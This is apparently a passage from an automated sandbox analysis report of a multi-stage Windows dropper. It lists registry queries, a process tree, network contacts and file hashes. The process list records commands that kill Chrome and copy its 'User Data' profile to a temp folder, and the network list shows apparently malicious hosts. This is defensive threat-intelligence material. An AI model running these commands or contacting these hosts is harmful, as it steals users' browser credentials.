| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 9aa6e16872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 1710990cbc64.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c862a054a35.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
08240101651be7e010.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
1710990cbc64.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
08240101651be7e1.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
c862a054a35.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
453c5fa76a849.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
53516815d3135fe3.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
9aa6e16872.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
f34b9ab9db6d16.exe
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
e4b2f18fb52218.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2532 -ip 2532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 564
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
4f5baa1083db067.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe" -a
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1016 -ip 1016
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 356
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 1136
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 172.67.75.166:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 25.27.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| N/A | 127.0.0.1:62806 | tcp | |
| N/A | 127.0.0.1:62808 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| US | 8.8.8.8:53 | 239.2.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
| MD5 | aaaf685d045b423d4d96ecaca344b4d5 |
| SHA1 | f2264a40421e66029db1cdf7fe8bb8ada2614862 |
| SHA256 | f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8 |
| SHA512 | 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2532-29-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-33-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-32-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-62-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2532-61-0x0000000064941000-0x000000006494F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
| MD5 | 0f3487e49d6f3a5c1846cd9eebc7e3fc |
| SHA1 | 17ba797b3d36960790e7b983c432f81ffb9df709 |
| SHA256 | fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a |
| SHA512 | fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
memory/4480-92-0x00000000006E0000-0x00000000007CE000-memory.dmp
memory/4564-93-0x0000000000830000-0x000000000085C000-memory.dmp
memory/4564-96-0x00000000027C0000-0x00000000027E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
memory/4564-108-0x00000000027F0000-0x00000000027F6000-memory.dmp
memory/4188-109-0x0000000000F10000-0x0000000001052000-memory.dmp
memory/1308-105-0x0000000000990000-0x0000000000998000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
| MD5 | 7aaf005f77eea53dc227734db8d7090b |
| SHA1 | b6be1dde4cf73bbf0d47c9e07734e96b3442ed59 |
| SHA256 | a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71 |
| SHA512 | 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d |
memory/4564-94-0x0000000001000000-0x0000000001006000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
| MD5 | e2213d70937e476e7a778f1712912131 |
| SHA1 | f8f09b6965c83c361210a1b11c8039b7ca9a30b9 |
| SHA256 | 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b |
| SHA512 | cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
| MD5 | 77c7866632ae874b545152466fce77ad |
| SHA1 | f48e76c8478a139ea77c03238a0499cfa1fc8cea |
| SHA256 | e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43 |
| SHA512 | e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8 |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
| MD5 | 5c2e28dedae0e088fc1f9b50d7d28c12 |
| SHA1 | f521d9d8ae7381e3953ae5cf33b4b1b37f67a193 |
| SHA256 | 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f |
| SHA512 | f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
| MD5 | 46e9d76672b9d24ba14ea963574cc6a2 |
| SHA1 | caf88d470dc1241aca2b159b26953194a8d59cca |
| SHA256 | 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7 |
| SHA512 | 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6 |
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
memory/2532-39-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2532-38-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2532-37-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2532-36-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2532-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2532-34-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2532-31-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2532-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
